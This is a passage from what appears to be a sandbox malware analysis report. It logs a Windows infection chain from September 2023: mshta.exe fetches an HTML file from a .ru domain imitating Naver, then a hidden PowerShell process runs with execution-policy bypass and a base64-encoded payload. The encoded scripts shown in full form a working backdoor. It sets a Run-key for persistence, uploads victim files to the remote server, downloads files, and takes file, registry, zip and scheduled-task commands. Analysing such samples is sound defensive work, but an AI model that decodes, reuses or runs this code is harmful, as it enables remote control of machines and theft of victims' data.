0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZABpAHIAJwA7AEQAagBVAHUAaQAgACQASABaAGcAcQBmAEIASwBYACAAJABmAGkAbABlAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBmAGkAbABlADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQAnADsARABqAFUAdQBpACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAE0AZQBqAFgAQwAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQATQBlAGoAWABDAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEQATQBFAEgAcwBRAEsAVgBVAGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAdABhAHMAawA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA1ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewAkAEEAYwB0AGkAbwBuACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AOwAkAFMAZQB0AHQAaQBuAGcAcwAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBPAG4AYwBlACAALQBBAHQAIAAoAEcAZQB0AC0ARABhAHQAZQApACAALQBSAGUAcABlAHQAaQB0AGkAbwBuAEkAbgB0AGUAcgB2AGEAbAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAAMQAwACkAOwAkAFQAYQBzAGsAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFMAZQB0AHQAaQBuAGcAcwAgACQAUwBlAHQAdABpAG4AZwBzADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVABhAHMAawBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABUAGEAcwBrADsAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAWABhAE4AcwBZAEoAYgBYAGoAVABuACAAJABIAFoAZwBxAGYAQgBLAFgAIAAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAOwB9AH0AaQBmACAAKAAkAGMAaQBlAC4AQwBvAG4AdABhAGkAbgBzACgAJwB6AGkAcAA6ACcAKQApAHsAJABNAGUAagBYAEMAPQAkAGMAaQBlAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAE0AZQBqAFgAQwAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFgAYQBOAHMAWQBKAGIAWABqAFQAbgAgACQASABaAGcAcQBmAEIASwBYACAAJABzAEUASwBjAEQAWAByAFkAYQBJAFYAdwBmADsAfQB9AGkAZgAgACgAJABjAGkAZQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQATQBlAGoAWABDAD0AJABjAGkAZQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABNAGUAagBYAEMALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQBpAGYAIAAoACQAYwBpAGUALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAZQBsADoAJwApACkAewAkAE0AZQBqAFgAQwA9ACQAYwBpAGUALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAE0AZQBqAFgAQwApAHsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAGUAagBYAEMAOwAkAHMARQBLAGMARABYAHIAWQBhAEkAVgB3AGYAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBYAGEATgBzAFkASgBiAFgAagBUAG4AIAAkAEgAWgBnAHEAZgBCAEsAWAAgACQAcwBFAEsAYwBEAFgAcgBZAGEASQBWAHcAZgA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA=
cmdline	mshta.exe http://navercorp.ru/dashboard/image/202302/4.html ,
cmdline	"C:\Windows\System32\mshta.exe" http://navercorp.ru/dashboard/image/202302/4.html ,

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 4, 2023, 10:28 a.m.	thread_identifier: 3044 thread_handle: 0x0000000000000410 process_identifier: 3040 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4ADsAJABWAHMAVgBtAGEARABqACAAPQAgADEAMAAyADQAIAAqACAAMQAwADIANAA7ACQAeAB3AGIAcAB5AG0AZABVAFcATgBzACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJABIAFoAZwBxAGYAQgBLAFgAIAA9ACAAJwBoAHQAdABwADoALwAvAG4AYQB2AGUAcgBjAG8AcgBwAC4AcgB1AC8AZABhAHMAaABiAG8AYQByAGQALwBpAG0AYQBnAGUALwAyADAAMgAzADAAMgAvAGMAbwBtAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJAB4AHcAYgBwAHkAbQBkAFUAVwBOAHMAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAagBYAFMAaABBAGUAZwBNAEUAVwBNAHcAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABmAEcAWgB0AE0AIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAAMwA5ADEANwA2ADMAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwBuAGEAdgBlAHIAYwBvAHIAcAAuAHIAdQAvAGQAYQBzAGgAYgBvAGEAcgBkAC8AaQBtAGEAZwBlAC8AMgAwADIAMwAwADIALwA0AC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFgAYQBOAHMAWQBKAGIAWABqAFQAbgAoACQAQwB6AHIASAAsACAAJABqAGQAVwBWACkAewAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBkAFcAVgApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnADsAJABWAGYAdABZAFoASAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABJAEoAYgBOAGcAcABSAGcAVQBMAEUAVABEAC4ATABlAG4AZwB0AGgAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAEkASgBiAE4AZwBwAFIAZwBVAEwARQBUAEQALAAgADAALAAgACQASQBKAGIATgBnAHAAUgBnAFUATABFAFQARAAuAEwAZQBuAGcAdABoACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4ARgBsAHUAcwBoACgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBDAGwAbwBzAGUAKAApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAgACQAUgBLAGMAbAAgAD0AIAAkAFYAZgB0AFkAWgBIAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQARAB5AGMARAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAUgBLAGMAbAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUATABUACAAPQAgACQARAB5AGMARAAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQAagBVAHUAaQAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACwAIAAkAHQAdQBwACwAIAAkAGIAQgBxAGwAVgApAHsAJABUAGkAbQBlAG8AdQB0AD0AMQAwADAAMAAwADAAMAAwADsAJABDAFIATABGACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAARAApACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADAAQQApADsAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAPQAgACcALQAtACcAOwAkAEIAbwB1AG4AZABhAHIAeQAgAD0AIAAnACoAKgAqACoAKgAnADsAJABzAHQAcgBlAGEAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBPAHAAZQBuAFIAZQBhAGQAKAAkAHYAUABFAGEAdgBSAE8AagB2AG4AKQA7ACQATAByAEIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABWAHMAVgBtAGEARABqADsAdwBoAGkAbABlACgAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABMAHIAQgAsADAALAAkAFYAcwBWAG0AYQBEAGoAKQApAHsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AIAAkAFYAZgB0AFkAWgBIACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAegByAEgAKQA7ACQAVgBmAHQAWQBaAEgALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwA7ACQAVgBmAHQAWQBaAEgALgBUAGkAbQBlAG8AdQB0ACAAPQAgACQAVABpAG0AZQBvAHUAdAA7ACQAVgBmAHQAWQBaAEgALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUAIAA9ACAAJABWAGYAdABZAFoASAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQAdAB1AHAAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABiAEIAcQBsAFYAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAFcAcgBpAHQAZQAoACQATAByAEIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGEAVgBOAHgAYQBkAEMAeABtAHQARQBRAEYAYQBVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADQALAAgADAALAAgACQAaABlAGEAZABpAG4AZwA0AC4ATABlAG4AZwB0AGgAKQA7ACQAYQBWAE4AeABhAGQAQwB4AG0AdABFAFEARgBhAFUALgBGAGwAdQBzAGgAKAApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJABSAEsAYwBsACAAPQAgACQAVgBmAHQAWQBaAEgALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABEAHkAYwBEACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABSAEsAYwBsAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQApADsAJABhAFYATgB4AGEAZABDAHgAbQB0AEUAUQBGAGEAVQBMAFQAIAA9ACAAJABEAHkAYwBEAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAARABNAEUASABzAFEASwBWAFUAaAAoACQAQwB6AHIASAAsACAAJAB2AFAARQBhAHYAUgBPAGoAdgBuACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAUgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHoAcgBIACkAOwAkAFIAZQBxAHUAZQBzAHQALgBzAGUAdABfAFQAaQBtAGUAbwB1AHQAKAAxADUAMAAwADAAKQA7ACQAUgBlAHMAcABvAG4AcwBlACAAPQAgACQAUgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAFMAcABsAGkAdABTAGkAegBlACAAPQAgADEAMAAyADQAOwAkAEIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAEIAeQB0AGUAWwBdACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAOwBUAHIAeQAgAHsARABvACAAewAkAEMAbwB1AG4AdAAgAD0AIAAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAFMAcABsAGkAdABTAGkAegBlACkAOwAkAG8AZgBmAHMAZQB0ACAAPQAgACQAQwBvAHUAbgB0ACAALQAgADEAOwBBAGQAZAAtAEMAbwBuAHQAZQBuAHQAIAAkAHYAUABFAGEAdgBSAE8AagB2AG4AIAAkAEIAdQBmAGYAZQByAFsAMAAuAC4AJABvAGYAZgBzAGUAdABdACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsAfQAgAFUAbgB0AGkAbAAoACQAQwBvAHUAbgB0ACAALQBlAHEAIAAwACkAfQAgAEMAYQB0AGMAaAAgAHsAfQAgAEYAaQBuAGEAbABsAHkAIAB7ACQAUgBlAHMAcABvA